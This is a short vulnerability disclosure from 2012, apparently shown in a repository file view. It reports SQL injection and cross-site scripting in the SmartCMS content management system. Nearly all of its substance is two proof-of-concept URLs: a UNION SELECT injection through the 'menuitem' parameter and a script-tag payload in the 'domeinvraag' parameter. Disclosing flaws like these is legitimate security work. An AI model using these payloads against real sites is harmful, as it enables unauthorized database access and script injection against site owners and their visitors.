18 lines
No EOL
928 B
Text
Executable file
18 lines
No EOL
928 B
Text
Executable file
##########################################################################
|
|
## SmartCMS SQL Injection & Cross Site Scripting Vulnerabilities
|
|
## Bug discovered by Yakir Wizman AKA Pr0T3cT10n, <yakir.wizman@gmail.com>
|
|
## Date: 29/11/2012
|
|
## Version: ALL
|
|
## Vendor Link: http://smartcms.nl/
|
|
## ISRAEL
|
|
##########################################################################
|
|
## Author will be not responsible for any damage.
|
|
##########################################################################
|
|
## SQL Injection PoC:
|
|
## http://www.example.com/index.php?menuitem=29+AND+1=2+UNION+ALL+SELECT+version()--
|
|
## Cross Site Scripting PoC:
|
|
## http://www.example.comindex.php?menuitem=26&domeinvraag=<script>alert(1);</script>&aktie=Zoek&idx=23
|
|
##########################################################################
|
|
# 0x31337.net
|
|
##########################################################################
|
|
|